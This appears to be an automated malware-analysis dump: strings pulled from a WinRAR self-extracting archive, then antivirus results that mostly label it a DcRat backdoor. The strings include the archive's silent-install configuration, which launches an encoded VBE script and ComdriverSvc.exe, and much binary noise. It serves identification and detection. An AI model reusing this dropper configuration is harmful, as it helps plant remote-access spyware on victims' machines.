:$:,:4:<:D:L:T:\:d:l:t:|: ;$;4;8;@;X;h;l;|;
<$<<<L<P<`<d<h<p<
<1H1l1
2 2@2L2l2x2
3(30383T3\3d3p3
4$4,484X4`4l4
5<5D5L5T5\5d5p5
6 6@6L6
7$787L7\7l7t7
8(848T8`8
9 9(9094989@9T9p9x9|9
: :(:T:X:`:h:p:t:|:
;8;X;x;
<8<X<x<
= =@=`=
0X1d1p1|1
2$202<2H2T2`2l2x2
3 3,383D3P3\3h3t3
4(444@4L4X4d4p4|4
5$505<5H5T5`5l5x5
6 6$6(6,6064686<6@6D6H6L6X7
8@=P=T=X=\=`=d=h=l=p=t=
> >8>`>
0 0$0(0,040<0@0D0L0P0T0X0\0`0d0h0l0t0x0|0
1 1$1(1,1014181<1@1D1H1L1P1T1X1\1`1d1h1p1t1x1|1
CMTSilent=1
Overwrite=1
Path="C:/runtimeMonitor/"
Setup=eW0NlR3z8rHah1r0tet2KhNAo.vbe
Update=U
PsYm20I.bat
"C:\runtimeMonitor\ComdriverSvc.exe"
ComdriverSvc.exe
!This program cannot be run in DOS mode.
`.rsrc
@.reloc
PK00.
Y_d
".<+>
\.!++
:.A+k
S.u8\
Y_dh}
X_b}
c_X<
c_X0
X],$
UUUU_
d UUUU_`
3333_
d 3333_`
lZ[YZ*
.b+`rB
b.:+@r
\/o~
Y_b`}
+_c
Y_b`
Y_b`
_b_,'
d`}3
v4.0.30319
#Strings
% * R \ ~
!%!.!<!K!\!k!r!
"/"H"S"`"
$ $?$E$i$x$
'"'''`'k'
((<(^(
) )()M)~)
***=*K*d*x*~*
+&+.+=+G+Z+s+x+
+Z,d,l,
-(->-R-b-
.-.Y.n.z.
.3/K/P/W/t/}/
0)0E0Z0t0
091>1e1u1
2.242F2Z2d2j2o2
3 4G4M4^4
6&646Z6b6z6
6#7-737M7_7u7
88(8<8K8P8]8c8s8
9$9;9C9I9a9g9|9
:.:2:H:O:c:
;!;,;8;A;G;L;R;V;^;k;
<%<D<z<
=)=9=_=m=x=}=
f6Y6O6q6
(#/#L#S#
$:%B%O%m%t%~%
'+(9(}(1*
.$.+/B/
<>9__1_0
<>9__13_0
<>9__3_0
<>9__15_0
<>9__7_0
HMACSHA1
<>9__3_1
<>9__15_1
<>9__7_1
Nullable`1
IEnumerable`1
Predicate`1
Queue`1
Stack`1
Action`1
ICollection`1
ReadOnlyCollection`1
Comparison`1
EventHandler`1
IEqualityComparer`1
IEnumerator`1
IList`1
Microsoft.Win32
ToUInt32
ToInt32
<>9__3_2
<>9__7_2
Func`2
IGrouping`2
Action`2
KeyValuePair`2
IDictionary`2
Func`3
Action`3
UInt64
ToInt64
<>9__5_4
<>9__5_5
ToUInt16
ToInt16
<>9__5_7
get_UTF8
<>9__5_8
<>9__3_9
<Module>
CreateCompatibleDC
CreateDC
DeleteDC
System.Drawing.Drawing2D
PlatformID
get_ASCII
System.IO
value__
DownloadData
PropertyData
mscorlib
set_Verb
ReleaseHdc
GetHdc
System.Collections.Generic
Microsoft.VisualBasic
FromFileTimeUtc
get_LastWriteTimeUtc
SetLastWriteTimeUtc
SetCreationTimeUtc
SetLastAccessTimeUtc
get_Id
get_ManagedThreadId
GetProcessById
get_CanRead
OpenRead
SuspendThread
ResumeThread
OpenThread
ProcessThread
get_CurrentThread
SHA1Managed
SHA256Managed
Interlocked
IsDefined
get_Elapsed
IsUnrestricted
System.Collections.Specialized
NewGuid
GetField
Append
get_Kind
DateTimeKind
SpecifyKind
get_Second
get_Millisecond
GetLowerBound
FromHwnd
set_Method
InvokeMethod
GetMethod
Clipboard
Replace
IsNullOrWhiteSpace
IsWhiteSpace
CreateInstance
CompileAssemblyFromSource
GetHashCode
set_Mode
FileMode
PaddingMode
CompressionMode
set_InterpolationMode
CipherMode
RwMode
get_CodePage
FromImage
DrawImage
get_Message
AddRange
CompareExchange
EndInvoke
BeginInvoke
IEnumerable
IDisposable
set_GenerateExecutable
Double
get_Handle
RuntimeFieldHandle
RuntimeTypeHandle
CloseHandle
GetTypeFromHandle
EventWaitHandle
Rectangle
Single
DownloadFile
IsVolatile
IsInRole
WindowsBuiltInRole
Console
get_MainWindowTitle
Module
set_WindowStyle
ProcessWindowStyle
get_Name
get_DeviceName
QueryFullProcessImageName
set_FileName
GetRandomFileName
GetFileName
get_MachineName
get_FullName
get_UserName
get_ProcessName
GetName
GetProcessesByName
GetAssemblyName
get_DirectoryName
GetDirectoryName
StackFrame
ToFileTime
DateTime
get_LastWriteTime
GetLastWriteTime
SetLastWriteTime
IsDaylightSavingTime
WhichTime
ToLocalTime
ToUniversalTime
get_CreationTime
GetCreationTime
get_LastAccessTime
GetLastAccessTime
WaitOne
get_Line
ReadLine
WriteLine
get_NewLine
Combine
LocalMachine
Escape
get_IsGenericType
get_FieldType
ChangeType
get_MimeType
ValueType
get_DriveType
get_DeclaringType
SecurityProtocolType
GetType
SocketType
GetElementType
set_ContentType
get_PropertyType
FileShare
Compare
System.Core
get_InvariantCulture
Capture
MethodBase
ReadOnlyCollectionBase
get_OrdinalIgnoreCase
HttpWebResponse
GetResponse
Dispose
TryParse
Reverse
Create
MulticastDelegate
Deflate
get_ThreadState
SetApartmentState
Delete
get_White
get_CanWrite
OpenWrite
ThreadStaticAttribute
DispIdAttribute
STAThreadAttribute
GuidAttribute
UnverifiableCodeAttribute
DebuggableAttribute
ComVisibleAttribute
TargetFrameworkAttribute
GetCustomAttribute
SuppressIldasmAttribute
ExtensionAttribute
DescriptionAttribute
IgnoreDataMemberAttribute
DefaultMemberAttribute
FlagsAttribute
CompilationRelaxationsAttribute
CLSCompliantAttribute
RuntimeCompatibilityAttribute
SuppressUnmanagedCodeSecurityAttribute
set_UseShellExecute
get_Minute
ReadByte
WriteByte
ToByte
Dequeue
Enqueue
get_Value
set_Value
DeleteValue
get_HasValue
TryGetValue
SetValue
RegistryHive
get_IsPrimitive
Remove
get_Size
set_BlockSize
get_TotalSize
set_KeySize
SuppressFinalize
SizeOf
LastIndexOf
SecurityPermissionFlag
HasFlag
get_Jpeg
System.Threading
set_Padding
UTF8Encoding
GetEncoding
System.Drawing.Imaging
System.Runtime.Versioning
get_IsWarning
FromBase64String
ToBase64String
EscapeDataString
DownloadString
get_VersionString
ToString
GetString
Substring
System.Drawing
ForEach
IsMatch
Stopwatch
get_Hash
ComputeHash
get_ExecutablePath
GetFullPath
GetTempPath
GetFolderPath
get_Width
get_Length
set_Length
GetLength
SetLength
set_ContentLength
EndsWith
StartsWith
get_Month
GrafRk
AsyncCallback
TimerCallback
WaitCallback
TransformFinalBlock
TransformBlock
get_CanSeek
Marshal
Decimal
get_Ordinal
System.Security.Principal
WindowsPrincipal
op_GreaterThanOrEqual
op_LessThanOrEqual
get_VolumeLabel
System.Collections.ObjectModel
System.ComponentModel
RemoveAll
WaitAll
gdi32.dll
kernel32.dll
user32.dll
winmm.dll
set_SecurityProtocol
ThreadPool
GetManifestResourceStream
FileStream
FromStream
GZipStream
GetRequestStream
MemoryStream
get_Param
get_Item
set_Item
QueueUserWorkItem
get_Is64BitOperatingSystem
SymmetricAlgorithm
HashAlgorithm
Random
ICryptoTransform
get_Platform
get_IsEnum
Boolean
LesserThan
op_GreaterThan
op_LessThan
TimeSpan
get_PrimaryScreen
AppDomain
get_CurrentDomain
SeekOrigin
get_Column
MessageBoxIcon
DestroyIcon
CopyIcon
GetExtension
GetFileNameWithoutExtension
get_OSVersion
get_Version
System.IO.Compression
SecurityPermission
ConsoleApplication
WinFormsApplication
get_Location
set_IncludeDebugInformation
ScreenOrientation
System.Globalization
System.Runtime.Serialization
Action
op_Subtraction
System.Reflection
ICollection
PropertyDataCollection
ProcessThreadCollection
NameValueCollection
StringCollection
GroupCollection
WebHeaderCollection
CompilerErrorCollection
ManagementObjectCollection
KeyCollection
LogicalConjunction
op_Addition
GetGenericTypeDefinition
get_Position
set_Position
SearchOption
IOException
add_UnhandledException
ObjectDisposedException
NotImplementedException
NotSupportedException
FileNotFoundException
ArgumentOutOfRangeException
IndexOutOfRangeException
PathTooLongException
ArgumentNullException
TargetInvocationException
InvalidOperationException
GetHRForException
UnauthorizedAccessException
FormatException
ArgumentException
OverflowException
get_Description
get_FileDescription
get_WaitReason
ThreadWaitReason
StringComparison
MessageBoxDefaultButton
SendTo
LesserThanOrEqualTo
GreaterThanOrEqualTo
NotEqualTo
CopyTo
GetMessageExtraInfo
ImageCodecInfo
FieldInfo
MethodInfo
FileInfo
CultureInfo
DriveInfo
FileSystemInfo
GetIconInfo
FileVersionInfo
GetVersionInfo
SerializationInfo
MemberInfo
ParameterInfo
GetCursorInfo
ConstructorInfo
ProcessStartInfo
DirectoryInfo
PropertyInfo
ToBitmap
FromHbitmap
GetHbitmap
Microsoft.CSharp
System.Linq
get_Year
DirectorySeparatorChar
get_ErrorNumber
StreamReader
TextReader
VBCodeProvider
CSharpCodeProvider
CodeDomProvider
IFormatProvider
StringBuilder
SpecialFolder
Encoder
Buffer
ServicePointManager
ManagementObjectSearcher
UnhandledExceptionEventHandler
System.CodeDom.Compiler
set_CookieContainer
ToUpper
StringComparer
CurrentUser
EncoderParameter
StreamWriter
TextWriter
TryEnter
BitConverter
ToLower
get_Major
set_ForegroundColor
ConsoleColor
ResetColor
CompilerError
IEnumerator
StringEnumerator
ManagementObjectEnumerator
GetEnumerator
.cctor
GetConstructor
Monitor
CreateEncryptor
UIntPtr
get_Hour
0hw1Wzc9DGZA6HLcWvPVAr1OzWpZNChOzWQ7Fs
Graphics
System.Diagnostics
get_Threads
GetFields
AddSeconds
get_TotalSeconds
FromSeconds
get_Bounds
GetMethods
System.Runtime.InteropServices
System.Runtime.CompilerServices
FormatterServices
get_EmbeddedResources
DebuggingModes
get_ReferencedAssemblies
GetDirectories
get_Properties
GetProperties
GetFiles
GetModules
NumberStyles
GetTypes
GetProcesses
get_Attributes
ImageAttributes
FileAttributes
GetCustomAttributes
GetAttributes
SetAttributes
get_TotalMinutes
FromMinutes
Rfc2898DeriveBytes
ReadAllBytes
GetBytes
NextBytes
get_Values
GetValues
GetDrives
BindingFlags
SocketFlags
EnumDisplaySettings
UnhandledExceptionEventArgs
System.Threading.Tasks
Equals
System.Windows.Forms
get_AllScreens
Contains
System.Text.RegularExpressions
System.Security.Permissions
System.Collections
InvokeMethodOptions
get_CompilerOptions
set_CompilerOptions
StringSplitOptions
RegexOptions
MessageBoxOptions
MessageBoxButtons
SetCursorPos
waveInGetDevCaps
get_Groups
get_Chars
get_Headers
GetImageEncoders
RuntimeHelpers
GetMethodParameters
EncoderParameters
CompilerParameters
GetParameters
get_Errors
get_HasErrors
FromHours
ManagementClass
FileAccess
get_Success
GetCurrentProcess
IPAddress
System.Net.Sockets
CompilerResults
set_Arguments
GetGenericArguments
Exists
waveInGetNumDevs
get_Keys
SendKeys
RemoveAt
Concat
TextDataFormat
AppendFormat
ImageFormat
get_DriveFormat
PixelFormat
ParseExact
GetUninitializedObject
ManagementBaseObject
DeleteObject
get_ExceptionObject
SelectObject
ManagementObject
Select
Collect
System.Net
Socket
get_Height
SendWait
IsDigit
GraphicsUnit
WaitForExit
BitBlt
get_Default
FirstOrDefault
IAsyncResult
DialogResult
set_UserAgent
get_Client
WebClient
TcpClient
System.Management
Environment
GetParent
MakeTransparent
get_Current
GetCurrent
AutoResetEvent
mouse_event
IPEndPoint
get_Count
GetByteCount
get_ProcessorCount
GetPathRoot
ThreadStart
Restart
Insert
Convert
HttpWebRequest
ToList
ContainsFileDropList
GetFileDropList
get_Host
set_Timeout
set_ReadWriteTimeout
SendInput
get_Output
MoveNext
System.Text
ReadAllText
WriteAllText
get_ErrorText
ContainsText
GetText
SetText
GetWindowText
StreamingContext
StartNew
RegistryView
get_Now
get_UtcNow
GetForegroundWindow
GetDesktopWindow
get_Index
MessageBox
GroupBy
get_Day
InitializeArray
ToArray
ToCharArray
get_IsArray
get_IsReady
get_Key
CreateSubKey
OpenSubKey
OpenBaseKey
ContainsKey
RegistryKey
System.Security.Cryptography
get_Assembly
get_CompiledAssembly
GetExecutingAssembly
set_OutputAssembly
AddressFamily
AsReadOnly
get_IsReadOnly
LastIndexOfAny
BlockCopy
IDictionary
ToDictionary
set_GenerateInMemory
get_Factory
TaskFactory
CreateDirectory
set_WorkingDirectory
get_SystemDirectory
get_RootDirectory
Registry
get_Capacity
Quality
op_Equality
op_Inequality
System.Security
WindowsIdentity
IsNullOrEmpty
System.Security.Permissions.SecurityPermissionAttribute, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
SkipVerification
WrapNonExceptionThrows
.NETFramework,Version=v4.0
FrameworkDisplayName
.NET Framework 4
$ebc25cf6-9120-4283-b972-0e5520d0000E
$ebc25cf6-9120-4283-b972-0e5520d0000D
$ebc25cf6-9120-4283-b972-0e5520d0000C
$ebc25cf6-9120-4283-b972-0e5520d00005
$ebc25cf6-9120-4283-b972-0e5520d00004
$ebc25cf6-9120-4283-b972-0e5520d0000B
$ebc25cf6-9120-4283-b972-0e5520d00006
$ebc25cf6-9120-4283-b972-0e5520d0000A
$ebc25cf6-9120-4283-b972-0e5520d00009
$ebc25cf6-9120-4283-b972-0e5520d00008
$ebc25cf6-9120-4283-b972-0e5520d00007
_CorExeMain
mscoree.dll
eW0NlR3z8rHah1r0tet2KhNAo.vbe
#@~^rQAAAA==j
Y~q/4?t
V^~',Z.+mYn6(L+1O`r
?1.rwDRUtnVsE*@#@&
U^DbwO UV+n2v&T!Zb@#@&j
/4?4nV^PxP;DnCD+r(%+1Y`r
jmMkaY ?4n^VE#@#@&
VV ]!x~J;lJD;
Yb:+tW
rYKD&nk5h+ZqR(CYr~PZS~0mVk+ujYAAA==^#~@
ComdriverSvc.exe
Maximum allowed array size (%u) is exceeded
SeSecurityPrivilege
SeRestorePrivilege
SeCreateSymbolicLinkPrivilege
rtmp%d
?*<>|"
*messages***
STRINGS
DIALOG
DIRECTION
s$%s:%s
CAPTION
Crypt32.dll
CryptProtectMemory failed
CryptUnprotectMemory failed
kernel32
version.dll
DXGIDebug.dll
sfc_os.dll
SSPICLI.DLL
rsaenh.dll
UXTheme.dll
dwmapi.dll
cryptbase.dll
lpk.dll
usp10.dll
clbcatq.dll
comres.dll
ws2_32.dll
ws2help.dll
psapi.dll
ieframe.dll
ntshrui.dll
atl.dll
setupapi.dll
apphelp.dll
userenv.dll
netapi32.dll
shdocvw.dll
crypt32.dll
msasn1.dll
cryptui.dll
wintrust.dll
shell32.dll
secur32.dll
cabinet.dll
oleaccrc.dll
ntmarta.dll
profapi.dll
WindowsCodecs.dll
srvcli.dll
cscapi.dll
slc.dll
imageres.dll
dnsapi.DLL
iphlpapi.DLL
WINNSI.DLL
netutils.dll
mpr.dll
devrtl.dll
propsys.dll
mlang.dll
samcli.dll
samlib.dll
wkscli.dll
dfscli.dll
browcli.dll
rasadhlp.dll
dhcpcsvc6.dll
dhcpcsvc.dll
XmlLite.dll
linkinfo.dll
cryptsp.dll
RpcRtRemote.dll
aclui.dll
dsrole.dll
peerdist.dll
uxtheme.dll
Please remove %s from %s folder. It is unsecure to run %s until it is done.
CreateThread failed
WaitForMultipleObjects error %d, GetLastError %d
Thread pool initialization failed.
%s: %s
ARarHtmlClassName
Shell.Explorer
about:blank
<html>
<head><meta http-equiv="content-type" content="text/html; charset=
utf-8"></head>
</html>
<style>
</style>
<style>body{font-family:"Arial";font-size:12;}</style>
&nbsp;
riched20.dll
RarSFX
STATIC
REPLACEFILEDLG
RENAMEDLG
%s %s %s
GETPASSWORD1
ASKNEXTVOL
winrarsfxmappingfile.tmp
sfxname
%4d-%02d-%02d-%02d-%02d-%02d-%03d
sfxstime
STARTDLG
sfxcmd
sfxpar
LICENSEDLG
__tmp_rar_sfx_access_check_%u
-el -s2 "-d%s" "-sp%s"
Delete
Silent
Overwrite
TempMode
License
Presetup
Shortcut
SavePath
Update
SetupCode
%s.%d.tmp
Software\Microsoft\Windows\CurrentVersion
ProgramFilesDir
%s%s%u
Install
Software\WinRAR SFX
KERNEL32.DLL
Cadvapi32
<pi-ms-win-core-fibers-l1-1-1
<pi-ms-win-core-synch-l1-2-0
(null)
mscoree.dll
Sunday
Monday
Tuesday
Wednesday
Thursday
Friday
Saturday
January
February
August
September
October
November
December
MM/dd/yy
dddd, MMMM dd, yyyy
HH:mm:ss
((((( H
(
((((( H
Capi-ms-win-appmodel-runtime-l1-1-1
<pi-ms-win-core-datetime-l1-1-1
<pi-ms-win-core-file-l2-1-1
<pi-ms-win-core-localization-l1-2-1
<pi-ms-win-core-localization-obsolete-l1-2-0
<pi-ms-win-core-processthreads-l1-1-2
<pi-ms-win-core-string-l1-1-0
<pi-ms-win-core-sysinfo-l1-2-1
<pi-ms-win-core-winrt-l1-1-0
<pi-ms-win-core-xstate-l2-1-0
api-ms-win-rtcore-ntuser-window-l1-1-0
api-ms-win-security-systemfunctions-l1-1-0
ext-ms-win-kernel32-package-current-l1-1-0
ext-ms-win-ntuser-dialogbox-l1-1-0
ext-ms-win-ntuser-windowstation-l1-1-0
user32
Cja-JP
zh-CHS
az-AZ-Latn
uz-UZ-Latn
kok-IN
syr-SY
div-MV
quz-BO
sr-SP-Latn
az-AZ-Cyrl
uz-UZ-Cyrl
quz-EC
sr-SP-Cyrl
quz-PE
smj-NO
bs-BA-Latn
smj-SE
sr-BA-Latn
sma-NO
sr-BA-Cyrl
sma-SE
sms-FI
smn-FI
zh-CHT
az-az-cyrl
az-az-latn
bs-ba-latn
div-mv
kok-in
quz-bo
quz-ec
quz-pe
sma-no
sma-se
smj-no
smj-se
smn-fi
sms-fi
sr-ba-cyrl
sr-ba-latn
sr-sp-cyrl
sr-sp-latn
syr-sy
uz-uz-cyrl
uz-uz-latn
zh-chs
zh-cht
CONOUT$
STARTDLG
REPLACEFILEDLG
RENAMEDLG
GETPASSWORD1
LICENSEDLG
ASKNEXTVOL
WinRAR self-extracting archive
MS Shell Dlg 2
&Destination folder
Bro&wse...
hRichEdit20W
Installation progress
jmsctls_progress32
Install
Cancel
Confirm file replace
MS Shell Dlg 2
The following file already exists
Would you like to replace the existing file
with this one?
Yes to &All
&Rename
No to A&ll
Antivirus Signature
Bkav W32.AIDetectMalware
Lionic Trojan.Win32.DcRat.m!c
tehtris Clean
ClamAV Win.Trojan.Uztuby-9855059-0
CMC Clean
CAT-QuickHeal Trojan.MsilFC.S33348414
Skyhigh BehavesLike.Win32.Generic.tm
ALYac Trojan.Agent.GGBO
Cylance Unsafe
Zillya Clean
Sangfor Trojan.Win32.Save.a
K7AntiVirus Trojan ( 005b0c8c1 )
Alibaba Backdoor:MSIL/DCRAT.c4b186a4
K7GW Spyware ( 00596bfb1 )
Cybereason malicious.880731
Baidu Clean
VirIT Trojan.Win32.Genus.LVV
Paloalto generic.ml
Symantec Trojan.Gen.MBT
Elastic malicious (high confidence)
ESET-NOD32 multiple detections
APEX Malicious
Avast Win32:DropperX-gen [Drp]
Cynet Malicious (score: 100)
Kaspersky UDS:Backdoor.MSIL.DcRat.gen
BitDefender Trojan.Agent.GGBO
NANO-Antivirus Trojan.Win32.DCRat.jswote
ViRobot Clean
MicroWorld-eScan Trojan.Agent.GGBO
Tencent Win32.Backdoor.Agent.Zwhl
TACHYON Clean
Sophos Troj/DCRat-J
F-Secure Heuristic.HEUR/AGEN.1371403
DrWeb BackDoor.DarkCrystalNET.18
VIPRE Trojan.Agent.GGBO
TrendMicro Backdoor.Win32.DCRAT.O
McAfeeD ti!59A058A95F24
Trapmine Clean
FireEye Trojan.Agent.GGBO
Emsisoft Trojan.Agent.GGBO (B)
SentinelOne Static AI - Malicious SFX
GData Win32.Trojan.BSE.1CL7UZW
Jiangmin Clean
Webroot Trojan.Dropper.Gen
Varist W32/S-1b09bef6!Eldorado
Avira VBS/Runner.VPG
Antiy-AVL Trojan[Backdoor]/MSIL.DCRat
Kingsoft Win32.Hack.Undef.a
Gridinsoft Trojan.Win32.Agent.cl
Xcitium Clean
Arcabit Trojan.Agent.GGBO
SUPERAntiSpyware Clean
ZoneAlarm HEUR:Backdoor.MSIL.DCRat.gen
Microsoft Backdoor:Win32/DCRAT.JP!MTB
Google Detected
AhnLab-V3 Clean
Acronis Clean
McAfee Artemis!DAE7EC388073
MAX malware (ai score=100)
VBA32 Dropper.MSIL.gen
Malwarebytes Generic.Spyware.Stealer.DDS
Panda Trj/CI.A
Zoner Clean
TrendMicro-HouseCall Backdoor.Win32.DCRAT.O
Rising Backdoor.DCRat!1.E0D3 (CLASSIC)
Yandex TrojanSpy.Agent!Exqepallu1E
Ikarus Trojan.VBS.Runner
MaxSecure Trojan.Malware.121218.susgen
Fortinet MSIL/Agent.DTR!tr.spy
BitDefenderTheta Gen:NN.ZemsilF.36810.bn0@a4@IZyoi
AVG Win32:DropperX-gen [Drp]
DeepInstinct MALICIOUS
CrowdStrike win/malicious_confidence_100% (W)
alibabacloud Backdoor:MSIL/DCRAT.JX8PHU
No IRMA results available.